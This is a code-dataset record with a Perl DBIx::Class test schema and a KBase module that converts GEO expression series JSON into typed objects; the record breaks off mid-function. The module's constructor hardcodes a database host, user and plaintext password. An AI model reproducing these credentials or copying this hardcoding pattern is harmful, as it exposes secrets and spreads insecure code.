eda25f4640e79734eff32f1dc570d036e0ec3435 | 560 | pm | Perl | t/lib/TestSchema/Result/Genre.pm | gitpan/WebAPI-DBIC | 03099ec39050b37d7079d39188c1475c79111d5c | [ "Artistic-1.0" ] | null | null | null | t/lib/TestSchema/Result/Genre.pm | gitpan/WebAPI-DBIC | 03099ec39050b37d7079d39188c1475c79111d5c | [ "Artistic-1.0" ] | null | null | null | t/lib/TestSchema/Result/Genre.pm | gitpan/WebAPI-DBIC | 03099ec39050b37d7079d39188c1475c79111d5c | [ "Artistic-1.0" ] | null | null | null |
package TestSchema::Result::Genre;
use warnings;
use strict;
use base qw/DBIx::Class::Core/;
__PACKAGE__->table('genre');
__PACKAGE__->add_columns(
genreid => {
data_type => 'integer',
is_auto_increment => 1,
},
name => {
data_type => 'varchar',
size => 100,
},
);
__PACKAGE__->set_primary_key('genreid');
__PACKAGE__->add_unique_constraint ( genre_name => [qw/name/] );
__PACKAGE__->has_many (cds => 'TestSchema::Result::CD', 'genreid');
__PACKAGE__->has_one (model_cd => 'TestSchema::Result::CD', 'genreid');
1;
| 20.740741 | 71 | 0.644643 |
edb0f65073ac73a9de277e3249cdac60b24cdb0f | 44,275 | pm | Perl | lib/Bio/KBase/KBaseExpression/GEO2TypedObjects.pm | scanon/expression | 53c7d5e5d9c96562fc42ed85bb1071919ed874d9 | [ "MIT" ] | null | null | null | lib/Bio/KBase/KBaseExpression/GEO2TypedObjects.pm | scanon/expression | 53c7d5e5d9c96562fc42ed85bb1071919ed874d9 | [ "MIT" ] | null | null | null | lib/Bio/KBase/KBaseExpression/GEO2TypedObjects.pm | scanon/expression | 53c7d5e5d9c96562fc42ed85bb1071919ed874d9 | [ "MIT" ] | null | null | null |
package Bio::KBase::KBaseExpression::GEO2TypedObjects;
use strict;
use Statistics::Descriptive;
use POSIX qw(floor);    # floor() is used below when computing the original median
#use Bio::KBase::Exceptions;
# Use Semantic Versioning (2.0.0-rc.1)
# http://semver.org
our $VERSION = "0.1.0";
=head1 NAME
GEO2TypedObjects
=head1 DESCRIPTION
=cut
#BEGIN_HEADER
use DBI;
use Storable qw(dclone);
use Config::Simple;
use Data::Dumper;
use IO::Uncompress::Gunzip qw(gunzip $GunzipError) ;
use IO::File;
use Bio::DB::Taxonomy;
use Bio::KBase;
use Bio::KBase::CDMI::CDMIClient;
use JSON::RPC::Client;
use JSON;
use Bio::KBase::IDServer::Client;
#require Exporter;
our (@ISA,@EXPORT);
@ISA = qw(Exporter);
@EXPORT = qw(new geo2TypedObjects);
#SUBROUTINES
#new
#trim -removes beginning and trailing white space
sub new
{
my($class, @args) = @_;
my $self = {
};
bless $self, $class;
#BEGIN_CONSTRUCTOR
#Copied from M. Sneddon's TreeImpl.pm from trees.git f63b672dc14f4600329424bc6b404b507e9c2503
my($deploy) = @args;
if (! $deploy) {
# if not, then go to the config file defined by the deployment and import
# the deployment settings
my %params;
if (my $e = $ENV{KB_DEPLOYMENT_CONFIG}) {
my $EXPRESSION_SERVICE_NAME = $ENV{KB_SERVICE_NAME};
my $c = Config::Simple->new();
$c->read($e);
my %temp_hash = $c->vars();
my @param_list = qw(dbName dbUser dbhost dbPwd);
for my $p (@param_list)
{
my $v = $c->param("$EXPRESSION_SERVICE_NAME.$p");
if ($v)
{
$params{$p} = $v;
$self->{$p} = $v;
}
}
}
else
{
$self->{dbName} = 'kbase_sapling_v4';
$self->{dbUser} = 'kbase_sapselect';
$self->{dbhost} = 'db4.chicago.kbase.us';
$self->{dbPwd} = 'oiwn22&dmwWEe';
# $self->{dbName} = 'expression';
# $self->{dbUser} = 'expressionselect';
# $self->{dbhost} = 'db1.chicago.kbase.us';
}
#Create a connection to the EXPRESSION (and print a logging debug mssg)
if( 0 < scalar keys(%params) ) {
warn "Connection to Expression Service established with the following non-default parameters:\n";
foreach my $key (sort keys %params) { warn " $key => $params{$key} \n"; }
} else { warn "Connection to Expression established with all default parameters.\n"; }
}
else
{
$self->{dbName} = 'kbase_sapling_v4';
$self->{dbUser} = 'kbase_sapselect';
$self->{dbhost} = 'db4.chicago.kbase.us';
$self->{dbPwd} = 'oiwn22&dmwWEe';
# $self->{dbName} = 'expression';
# $self->{dbUser} = 'expressionselect';
# $self->{dbhost} = 'db1.chicago.kbase.us';
}
#END_CONSTRUCTOR
if ($self->can('_init_instance'))
{
$self->_init_instance();
}
return $self;
}
sub trim($)
{
#removes beginning and trailing white space
my $string = shift;
if (defined($string))
{
$string =~ s/^\s+//;
$string =~ s/\s+$//;
}
return $string;
}
sub geo2TypedObjects
{
#Takes in 2 arguements :
# 1) a file path and name to a GSE Object in JSON format
# 2) data source
# 3) directory of geo_results (running list of files storing ids and results of geo objects)
# 4) directory where to write the workspace typed objects in json format
#returns a "1" if successful or a "0 - error_string" if failed
#This does checking for existing Platform, Samples and Series being created by looking in the contents
#of the platforms, samples and series files located in $geo_results_directory (arg3)
#The typed objects will be stored in json format in $typed_objects_directory (arg4)
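    #Illustrative call (hypothetical paths and data source label; shown only as a sketch of the contract described above):
    # my $converter = Bio::KBase::KBaseExpression::GEO2TypedObjects->new();
    # my $status = $converter->geo2TypedObjects('/scratch/GSE12345_gse.json', 'GEO',
    #                                           '/scratch/geo_results', '/scratch/typed_objects');
    # $status eq "1" or die "geo2TypedObjects failed: $status";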
my $self = shift;
my $gse_object_file = shift;
my $data_source = shift;
my $geo_results_directory = shift;
my $typed_objects_directory = shift;
open (JSON_FILE,$gse_object_file) or die "0 - Unable to open $gse_object_file , it was supposed to exist";
my ($json_result,@temp_array)= (<JSON_FILE>);
close(JSON_FILE);
if ($json_result eq "{}")
{
return "0 - GSE OBJECT FILE : ".$gse_object_file." was an empty hash";
}
my $gse_object_ref = from_json($json_result);
my $gse_results_file = $geo_results_directory."/gse_results";
my $gpl_results_file = $geo_results_directory."/gpl_results";
my $gsm_results_file = $geo_results_directory."/gsm_results";
my $id_server = Bio::KBase::IDServer::Client->new("http://kbase.us/services/idserver");
my %processed_gse_hash = get_processed_gse_hash($gse_results_file); #returns a hash key gse_id => {"id" => kb|series.#,
# "result" => result}
my %processed_gpl_hash = get_processed_gpl_hash($gpl_results_file); #returns a hash key gpl_id => value kb|platform.#
my %processed_gsm_hash = get_processed_gsm_hash($gsm_results_file);
    #returns a hash key gsm_id => {genome => {data_quality_level => value kb|sample.#}}
my $current_gse_id = $gse_object_ref->{'gseID'};
my %sample_ids_already_in_series;
if(exists($processed_gse_hash{$current_gse_id}{"sample_ids"}))
{
my @sample_ids_array = split("\s*,\s*",$processed_gse_hash{$current_gse_id}{"sample_ids"});
foreach my $sample_id (@sample_ids_array)
{
$sample_ids_already_in_series{$sample_id} = 1;
}
}
else
{
delete($processed_gse_hash{$current_gse_id});
}
#check if GSE has errors
my @gse_errors = @{$gse_object_ref->{'gseErrors'}};
if (scalar(@gse_errors) > 0)
{
if ((exists($processed_gse_hash{$current_gse_id})))
{
return "1";
}
else
{
delete($processed_gse_hash{$current_gse_id});
}
#write out gse record result
open (GSE_RESULTS_FILE, ">>".$gse_results_file) or return "0 - Unable to make/append to $gse_results_file \n";
#the first column is the GSE_ID
#the second column is the KBase Series ID (if it exists)
#the third column is the upload result (3 possible values "Full Success","Partial Success"(some of GSMs passed, but not all),"Failure"
#the fourth column is the warning and error messages (separated by "___", 3 underscores)
#the fifth column is comma separated list of ids for the samples that the series contains.
#GRAB ERRORS REMOVE "\n", concatenate with 3 underscores
my $gse_error_message = join("___",@gse_errors);
$gse_error_message =~ s/\n/ /g;
print GSE_RESULTS_FILE $current_gse_id . "\t\tFailure\t" . $gse_error_message . "\t\n";
        close(GSE_RESULTS_FILE);
#loop through each GSM and write out gsm record result
open (GSM_RESULTS_FILE, ">>".$gsm_results_file) or return "0 - Unable to make/append to $gsm_results_file \n";
my @gsm_ids = keys(%{$gse_object_ref->{'gseSamples'}});
foreach my $gsm_id (@gsm_ids)
{
#the first column is the GSM_ID
#the second column is the Genome (kbase genome id)
#the third column is the DataQualityLevel (currently 3 possible int values -
# "1" for kbase pipeline processed data, "2" for seq blat mapped geo data, "3" for synonym mapped geo data
#the fourth column is the KBase Sample ID (if it exists)
#the fifth column is the warning and error messages (separated by "___", 3 underscores)
my @genome_list;
if (scalar(keys(%{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmPlatform'}->{'genomesMappingMethod'}})) == 0)
{
@genome_list = ('');
}
else
{
@genome_list = keys(%{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmPlatform'}->{'genomesMappingMethod'}});
}
my $gsm_error_message = join("___",@{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'errors'}});
$gsm_error_message =~ s/\n/ /g;
foreach my $genome_id (@genome_list)
{
print GSM_RESULTS_FILE $gsm_id . "\t".$genome_id."\t\t\t".$gsm_error_message."\n";
}
}
close(GSM_RESULTS_FILE);
return "1";
}
else
{
#PROCESS PLATFORMS
#the GSE passed and at least 1 gsm passed
my %gpl_object_hash; #key = gpl_id, value = platform typedef structure { id => val,
# source_id => val,
# genome_id => val,
# technology => val,
# title => val,
# strain => {genome_id=>val,
# reference_strain => val (Y or N),
# wild_type => val (Y or N),
# description => val,
# name => val}}
my @gsm_ids = keys(%{$gse_object_ref->{'gseSamples'}});
my $dbh = DBI->connect('DBI:mysql:'.$self->{dbName}.':'.$self->{dbhost}, $self->{dbUser}, $self->{dbPwd},
{ RaiseError => 1, ShowErrorStatement => 1 }
);
my $passing_gsm_count = 0;
my $failing_gsm_count = 0;
#check each passing GSM and grab the platform build up unique platform objects (see if they already exist)
foreach my $gsm_id (@gsm_ids)
{
if (scalar(@{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'errors'}}) == 0)
{
my %gpl_hash = %{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmPlatform'}};
my $gpl_id = $gpl_hash{'gplID'};
#check if it has been processed in previous runs
unless(exists($processed_gpl_hash{$gpl_id}))
{
#check if gpl has been encountered in file before
unless(exists($gpl_object_hash{$gpl_id}))
{
#Build up the platform object
#Grab genomes based on scientific_name and tax_id (which one to select?)
my $ncbi_db = Bio::DB::Taxonomy->new(-source=>"entrez");
my $ncbi_taxon = $ncbi_db->get_taxon(-taxonid=>$gpl_hash{'gplTaxID'});
my @ncbi_scientific_names = @{$ncbi_taxon->{'_names_hash'}->{'scientific'}};
# my $get_genome_ids_q = "select id from Genome where scientific_name in (".
# join(",", ("?") x @ncbi_scientific_names) . ") ";
my $get_genome_ids_q = "select distinct g.id from Genome g left outer join ".
"IsTaxonomyOf it on it.to_link = g.id left outer join ".
"TaxonomicGrouping tg on tg.id = it.from_link ".
"where (tg.scientific_name in (".
join(",", ("?") x @ncbi_scientific_names) . ") and it.confidence >= 2) ".
"or g.scientific_name in (".
join(",", ("?") x @ncbi_scientific_names) . ") ";
my $get_genome_ids_qh = $dbh->prepare($get_genome_ids_q) or return "0 - Unable to prepare get_genome_ids_q : $get_genome_ids_q ".
$dbh->errstr();
$get_genome_ids_qh->execute(@ncbi_scientific_names,@ncbi_scientific_names) or return "0 - Unable to execute get_genome_ids_q : $get_genome_ids_q " .
$get_genome_ids_qh->errstr();
my $genome_id_selected = '';
my %genome_ids_hash;
while (my ($genome_id) = $get_genome_ids_qh->fetchrow_array())
{
$genome_ids_hash{$genome_id} = 1;
}
my %genomes_map_results = %{$gpl_hash{'genomesMappingMethod'}};
foreach my $genome_id (sort(keys(%genomes_map_results)))
{
#will preferentially choose a mapped genome assuming the genome maps to the Platform tax ID.
if ($genome_id_selected eq '')
{
if (($genomes_map_results{$genome_id} ne "UNABLE TO MAP PROBES BY SEQUENCE OR EXTERNAL IDS") &&
($genome_ids_hash{$genome_id} == 1))
{
$genome_id_selected = $genome_id;
}
}
}
if ($genome_id_selected eq '')
{
if (scalar(keys(%genome_ids_hash)) > 0)
{
#if mapped genome does not match GPL genome ids, Will select first (sorted) GPL genome id.
my @genome_keys = sort(keys(%genome_ids_hash));
$genome_id_selected = $genome_keys[0];
}
else
{
foreach my $genome_id (sort(keys(%genomes_map_results)))
{
if ($genomes_map_results{$genome_id} ne "UNABLE TO MAP PROBES BY SEQUENCE OR EXTERNAL IDS")
{
$genome_id_selected = $genome_id;
}
}
}
}
if ($genome_id_selected eq '')
{
#should not be possible to reach this as at least one gsm genome should
                            #have been able to be mapped to have a gse w/o errors
open (GSE_RESULTS_FILE, ">>".$gse_results_file) or return "0 - Unable to make/append to $gse_results_file \n";
print GSE_RESULTS_FILE $current_gse_id . "\t\tFailure\tUnable to find a tax id mapping for platform. Should not be able to reach this error.\t\n";
                            close(GSE_RESULTS_FILE);
return 1;
}
#grab kbase_platform_id for it
#Next two lines for testing
# my $platform_prefix = "kb|platform_test"; #if want to test it do it for sample and series as well. Then comment out next line.
# my $kb_gpl_id = $platform_prefix .".".$id_server->allocate_id_range( $platform_prefix, 1 );
#Next three lines for real
my $platform_prefix = "kb|platform";
my $temp_id_hash_ref;
my $id_counter_try = 0;
while (! defined $temp_id_hash_ref)
{
eval {
$temp_id_hash_ref = $id_server->register_ids($platform_prefix,"GEO",[$gpl_id]);
};
if ($@)
{
my $msg = $@;
if ($id_counter_try < 20 && $msg =~ /500\s+Internal\s+Server\s+Error/i)
{
print "Retrying ID server call.\n";
$id_counter_try++;
sleep 1;
}
else
{
print "ID server error ($id_counter_try retries): $msg\n";
print "ID server call: $platform_prefix, GEO , $gpl_id \n";
die "ID server failed.";
}
}
}
my $kb_gpl_id = $temp_id_hash_ref->{$gpl_id};
$gpl_object_hash{$gpl_id}={"id" =>$kb_gpl_id,
"source_id" => $gpl_id,
"genome_id" => $genome_id_selected,
"technology" => $gpl_hash{"gplTechnology"},
"title" => $gpl_hash{"gplTitle"},
"strain" => {"genome_id" => $genome_id_selected,
"reference_strain" => "Y",
"wild_type" => "Y",
"description" => "$genome_id_selected wild_type reference strain",
"name" => "$genome_id_selected wild_type reference strain"}};
}
}
}
}
#print "\n\nGPL OBJECT HASH : ".Dumper(\%gpl_object_hash)."\n\n";
if (scalar(keys(%gpl_object_hash)) > 0)
{
open (GPL_RESULTS_FILE, ">>".$gpl_results_file) or return "0 - Unable to make/append to $gpl_results_file \n";
foreach my $gpl_id (keys(%gpl_object_hash))
{
#add it to the %processed_gpl_hash (used later for looking up kb_platform_ids for building the GSM)
$processed_gpl_hash{$gpl_id} = $gpl_object_hash{$gpl_id}{"id"};
#write the GPL info in the file
print GPL_RESULTS_FILE $gpl_id . "\t".$gpl_object_hash{$gpl_id}{"id"}."\n";
#CREATE JSON OBJECT FILE
my $temp_platform_file_name = $gpl_object_hash{$gpl_id}{"id"};
$temp_platform_file_name =~ s/kb\|//;
my $platform_file_name = $typed_objects_directory."/".$temp_platform_file_name;
open(PLATFORM_FILE, ">".$platform_file_name) or return "0 - Unable to make to $platform_file_name \n";
print PLATFORM_FILE to_json($gpl_object_hash{$gpl_id});
close(PLATFORM_FILE);
}
close (GPL_RESULTS_FILE);
}
#PROCESS SAMPLES
#get sample kbase IDS for later use in the series Objects
my @sample_id_array; #array of Sample Kbase IDs associated with the Series (could be both new and old GSMs)
my @new_sample_id_array; #Array of new id of new GSMs to be added. : new gsm = distinct (GSM - Genome - DataQualityLevel combination).
#If at least one new one and the GSE already exist, need to save a new verion of the GSE
#(extra entries in the sample list)
open (GSM_RESULTS_FILE, ">>".$gsm_results_file) or return "0 - Unable to make/append to $gsm_results_file \n";
#the first column is the GSM_ID
#the second column is the Genome (kbase genome id)
#the third column is the DataQualityLevel (currently 3 possible int values -
# "1" for kbase pipeline processed data, "2" for seq blat mapped geo data, "3" for synonym mapped geo data
#the fourth column is the KBase Sample ID (if it exists)
#the fifth column is the warning and error messages (separated by "___", 3 underscores)
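        #Illustrative row (tab separated; the ids and message below are made-up examples):
        # GSM21610\tkb|g.20029\t2\tkb|sample.1423\tProbes mapped by synonym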
#loop through all passing GSMs and build up sample objects (see if they already exist)
my @gsm_ids = keys(%{$gse_object_ref->{'gseSamples'}});
foreach my $gsm_id (@gsm_ids)
{
if (scalar(@{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'errors'}}) == 0)
{
#grab shared sample object data
my $gsm_type = "microarray";
# my $gsm_numerical_interpretation = "Log2 level intensities";
my $gsm_numerical_interpretation;
if(exists($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'numerical_interpretation'}) &&
(trim($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'numerical_interpretation'}) ne ""))
{
$gsm_numerical_interpretation = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'numerical_interpretation'};
}
my $gsm_description = "";
if(exists($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmDescription'}) &&
(trim($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmDescription'}) ne ""))
{
$gsm_description = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmDescription'};
}
$gsm_description .= "::Value Description : ".$gse_object_ref->{'gseSamples'}->{$gsm_id}->{"gsmValueType"};
my $gsm_title = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmTitle'};
my $gsm_external_source_date = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmSubmissionDate'};
my $RMA_normalized = 0;
if (exists($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'rmaNormalized'}) &&
($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'rmaNormalized'} ne ""))
{
if ($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'rmaNormalized'} eq "1")
{
$RMA_normalized = 1;
}
else
{
$RMA_normalized = 0;
}
}
my $gsm_molecule = "";
if (exists($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmMolecule'}) &&
($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmMolecule'} ne ""))
{
$gsm_molecule = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmMolecule'};
}
my $gsm_data_source = $data_source;
my $gsm_platform_id = $processed_gpl_hash{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmPlatform'}->{'gplID'}};
#Protocol
my $gsm_protocol = "";
if ((exists($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmProtocol'})) &&
($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmProtocol'} ne ""))
{
my $gsm_protocol_name = $gsm_id . " protocol";
$gsm_protocol = {"name"=>$gsm_protocol_name,
"description"=>$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmProtocol'}};
}
#Characteristics
my $gsm_characteristics = "";
my @gsm_characteristics_list = @{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmSampleCharacteristics'}};
if (scalar(@gsm_characteristics_list) > 0)
{
$gsm_characteristics = join(":: ",@gsm_characteristics_list);
}
#Persons
my @persons;
foreach my $person_email (keys(%{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'contactPeople'}}))
{
if ($person_email ne "")
{
my $first_name = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'contactPeople'}->{$person_email}->{'contactFirstName'};
if (!(defined($first_name)) || ($first_name eq ""))
{
$first_name = "unknown";
}
my $last_name = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'contactPeople'}->{$person_email}->{'contactLastName'};
if (!(defined($last_name)) || ($last_name eq ""))
{
$last_name = "unknown";
}
my $institution = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'contactPeople'}->{$person_email}->{'contactInstitution'};
if (!(defined($institution)) || ($institution eq ""))
{
$institution = "unknown";
}
push(@persons,{"email" => $person_email,
"first_name" => $first_name,
"last_name" => $last_name,
"institution" => $institution});
}
}
#NEED TO GRAB OTHER ONTOLOGY TERM INFO FROM THE DATABASE.
my @expression_ontology_terms;
my @ontology_term_ids = @{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmOntologies'}};
#print "\n\nONTOLOGY TERM IDS : ". join(":",@ontology_term_ids) ;
if (scalar(@ontology_term_ids > 0))
{
my $get_ontology_info_q = "select id, name, definition from Ontology where id in (".
join(",", ("?") x @ontology_term_ids) . ") ";
my $get_ontology_info_qh = $dbh->prepare($get_ontology_info_q) or return "0 - Unable to prepare get_ontology_info_q : $get_ontology_info_q ".
$dbh->errstr();
$get_ontology_info_qh->execute(@ontology_term_ids) or die "UNABLE TO EXECUTE ONTS ".
#return "0 -
"Unable to execute get_ontology_info_q : $get_ontology_info_q ".
$get_ontology_info_qh->errstr();
while(my ($temp_term_id, $temp_term_name, $temp_term_definition) = $get_ontology_info_qh->fetchrow_array())
{
push(@expression_ontology_terms,{'expression_ontology_term_id'=>$temp_term_id,
'expression_ontology_term_name'=>$temp_term_name,
'expression_ontology_term_definition'=>$temp_term_definition});
}
}
#genome specific data : id, genome_id, expression_levels, original_median, data_quality_level, strain (all of strain)
#loop through each passing GENOME
my @genome_ids = keys(%{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmData'}});
foreach my $temp_genome_id (@genome_ids)
{
my $dataQualityLevel = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmData'}->{$temp_genome_id}->{'dataQualityLevel'};
my $gsm_processing_comments = "";
my $temp_kbase_id = "";
if(exists($processed_gsm_hash{$gsm_id}{$temp_genome_id}{$dataQualityLevel}))
{
$temp_kbase_id = $processed_gsm_hash{$gsm_id}{$temp_genome_id}{$dataQualityLevel};
}
if (exists($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmData'}->{$temp_genome_id}->{'processing_comments'}) &&
($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmData'}->{$temp_genome_id}->{'processing_comments'} ne ""))
{
$gsm_processing_comments = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmData'}->{$temp_genome_id}->{'processing_comments'};
}
if($temp_kbase_id ne "")
{
#means the sample already exists just need to add the sample kbase_id to the list of samples for the
push(@sample_id_array,$temp_kbase_id);
unless (exists($sample_ids_already_in_series{$temp_kbase_id}))
{
push(@new_sample_id_array,$temp_kbase_id);
}
$passing_gsm_count++;
}
elsif (scalar(@{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmData'}->{$temp_genome_id}->{'errors'}}) > 0)
{
#DO NOTHING as the GSM and genome combination has an error. No sample gets made.
}
else
{
#we have a new GSM-Genome-DQL combination ( will be made into a new sample object)
my %expression_levels_hash;
my %temp_levels_hash = %{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmData'}->{$temp_genome_id}->{'features'}};
foreach my $temp_feature_id (keys(%temp_levels_hash))
{
$expression_levels_hash{$temp_feature_id} = $temp_levels_hash{$temp_feature_id}->{'mean'};
}
my $original_log2_median;
unless(exists($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmData'}->{$temp_genome_id}->{'originalLog2Median'}))
{
my @temp_level_keys = sort { $expression_levels_hash{$a} <=> $expression_levels_hash{$b} } keys(%expression_levels_hash);
my $num_measurements = scalar(@temp_level_keys);
if (($num_measurements%2) == 0)
{
$original_log2_median = ($expression_levels_hash{$temp_level_keys[(($num_measurements/2)-1)]} +
$expression_levels_hash{$temp_level_keys[($num_measurements/2)]})/2;
}
else
{
$original_log2_median = $expression_levels_hash{$temp_level_keys[(floor($num_measurements/2))]};
}
foreach my $feature_id (@temp_level_keys)
{
$expression_levels_hash{$feature_id} = $expression_levels_hash{$feature_id} - $original_log2_median;
}
}
else
{
$original_log2_median = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmData'}->{$temp_genome_id}->{'originalLog2Median'};
}
#within sample loop
#grab kbase_sample_id for it
#Next two lines for testing
# my $sample_prefix = "kb|sample_test";
# my $sample_kb_id = $sample_prefix .".".$id_server->allocate_id_range( $sample_prefix, 1 );
#Next four lines for real
my $sample_prefix = "kb|sample";#
my $sample_id_key = "GEO::".$gsm_id."::".$temp_genome_id."::".$dataQualityLevel;
my $temp_id_hash_ref;
my $id_counter_try = 0;
while (! defined $temp_id_hash_ref)
{
eval
{
$temp_id_hash_ref = $id_server->register_ids($sample_prefix,"GEO",[$sample_id_key]);
};
if ($@)
{
my $msg = $@;
if ($id_counter_try < 20 && $msg =~ /500\s+Internal\s+Server\s+Error/i)
{
print "Retrying ID server call.\n";
$id_counter_try++;
sleep 1;
}
else
{
print "ID server error ($id_counter_try retries): $msg\n";
print "ID server call: $sample_prefix, GEO $sample_id_key \n ";
die "ID server failed.";
}
}
}
my $sample_kb_id = $temp_id_hash_ref->{$sample_id_key};
#add sample_kb_id to gse_list
push(@sample_id_array,$sample_kb_id);
#new sample - push id onto new_sample_id_array;
push(@new_sample_id_array,$sample_kb_id);
$passing_gsm_count++;
#write out the samples in the processed_gsm_file
my $gsm_warning_message = "";
if (exists($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'warnings'}))
{
$gsm_warning_message = join("___",@{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'warnings'}});
$gsm_warning_message =~ s/\n/ /g;
}
print GSM_RESULTS_FILE $gsm_id . "\t".$temp_genome_id."\t".$dataQualityLevel."\t".$sample_kb_id."\t".$gsm_warning_message."\n";
#BUILD UP FULL SAMPLE OBJECT
#note "default_control_sample"
# and "averaged_from_samples" are not set by this (those are custom fields that require users to set that data)
$dataQualityLevel = $dataQualityLevel + 0;#To coerce back to an integer
my $sample_object_ref = {"id" =>$sample_kb_id,
"source_id" => $sample_id_key . "___" . $gsm_id,
"type"=>$gsm_type,
"numerical_interpretation"=>$gsm_numerical_interpretation,
"title"=>$gsm_title,
"data_quality_level"=>$dataQualityLevel,
"original_median"=>$original_log2_median,
"external_source_date"=>$gsm_external_source_date,
"expression_levels"=>\%expression_levels_hash,
"genome_id" => $temp_genome_id,
"platform_id"=>$gsm_platform_id,
"strain"=>{"genome_id" => $temp_genome_id,
"reference_strain" => "Y",
"wild_type" => "Y",
"description" => "$temp_genome_id wild_type reference strain",
"name" => "$temp_genome_id wild_type reference strain"},
"data_source"=>$gsm_data_source,
"RMA_normalized"=>$RMA_normalized,
};
if (scalar(@expression_ontology_terms) > 0)
{
#print "\nHAVE ONTOLOGY TERMS:\n";
$sample_object_ref->{"expression_ontology_terms"}=\@expression_ontology_terms;
}
if ($gsm_protocol)
{
$sample_object_ref->{"protocol"}=$gsm_protocol;
}
if ($gsm_description)
{
$sample_object_ref->{"description"}=$gsm_description;
}
if ($gsm_molecule)
{
$sample_object_ref->{"molecule"}=$gsm_molecule;
}
if (scalar(@persons) > 0)
{
$sample_object_ref->{"persons"}=\@persons;
}
if ($gsm_processing_comments)
{
$sample_object_ref->{"processing_comments"}=$gsm_processing_comments;
}
if ($gsm_characteristics)
{
$sample_object_ref->{"characteristics"}=$gsm_characteristics;
}
#Write out object
#CREATE JSON OBJECT FILE
my $temp_sample_file_name = $sample_kb_id;
$temp_sample_file_name =~ s/kb\|//;
my $sample_file_name = $typed_objects_directory."/".$temp_sample_file_name;
open(SAMPLE_FILE, ">".$sample_file_name) or return "0 - Unable to make to $sample_file_name \n";
print SAMPLE_FILE to_json($sample_object_ref);
close(SAMPLE_FILE);
}
}
}
else
{
#GSM HAS A ERROR ADD TO FILE
my @genome_list;
if (scalar(keys(%{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmPlatform'}->{'genomesMappingMethod'}})) == 0)
{
@genome_list = ('');
}
else
{
@genome_list = keys(%{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmPlatform'}->{'genomesMappingMethod'}});
}
my $gsm_error_message = join("___",@{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'errors'}});
$gsm_error_message =~ s/\n/ /g;
$failing_gsm_count++;
foreach my $genome_id (@genome_list)
{
print GSM_RESULTS_FILE $gsm_id . "\t".$genome_id."\t\t\t".$gsm_error_message."\n";
}
}
}
close(GSM_RESULTS_FILE);
my %sample_genome_hash = create_sample_genome_hash($gsm_results_file);
#PROCESS SERIES (IF new SERIES, or existing SERIES but need to add new samples to the list (NEED TO STORE sample_id_list)).
#NOTE IF SERIES EXISTS ALREADY NEED TO SLURP UP ENTIRE GSE_RESULTS_FILE AND CHANGE THAT GSE ENTRY
#(TO INCLUDE THE NEW SAMPLE_IDS)(CAN GET SAMPLE_IDS_THEN)
#grab series data, write it to file, build up return typed object
#check to see if it exists all ready. If it does, get the id for it and the list of SampleIDs associated with it.
#if it does not get new id.
my $series_id;
my %sample_ids_in_series;#key kb_sample_id => genome_id
foreach my $temp_kb_sample_id (@sample_id_array)
{
$sample_ids_in_series{$temp_kb_sample_id}=$sample_genome_hash{$temp_kb_sample_id};
}
if (exists($processed_gse_hash{$current_gse_id}{"id"}))
{
#means the GSE exists but new sample_ids need to be added to it.
#need to make the full SERIES typed object again using existing id
#merged set between @sample_id_array and %sample_ids_already_in_series
$series_id = $processed_gse_hash{$current_gse_id}{"id"};
#print "\nIN IF : Existing series\n";
foreach my $temp_kb_sample_id (keys(%sample_ids_already_in_series))
{
$sample_ids_in_series{$temp_kb_sample_id}=$sample_genome_hash{$temp_kb_sample_id};
}
#need to change geo results file and overwrite the previous entry (new list of sample_ids)
if ($passing_gsm_count == 0)
{
return "0 - $current_gse_id had no passing GSMs, but should not have reached this error \n";
}
my $result = $processed_gse_hash{$current_gse_id}{"result"};
if (($result eq "Full Success") && ($failing_gsm_count > 0))
{
$result = "Partial Success";
}
my @gse_warnings = @{$gse_object_ref->{'gseWarnings'}};
my $warning_messages = join("___",@gse_warnings);
my @gse_results_lines;
if (-e $gse_results_file)
{
open (GSE_RESULTS,$gse_results_file) or return "0 - Unable to open $gse_results_file , it was supposed to exist";
@gse_results_lines = (<GSE_RESULTS>);
close (GSE_RESULTS);
}
open (GSE_RESULTS_FILE, ">".$gse_results_file) or return "0 - Unable to make to $gse_results_file \n";
my $old_messages = "";
foreach my $gse_result_line (@gse_results_lines)
{
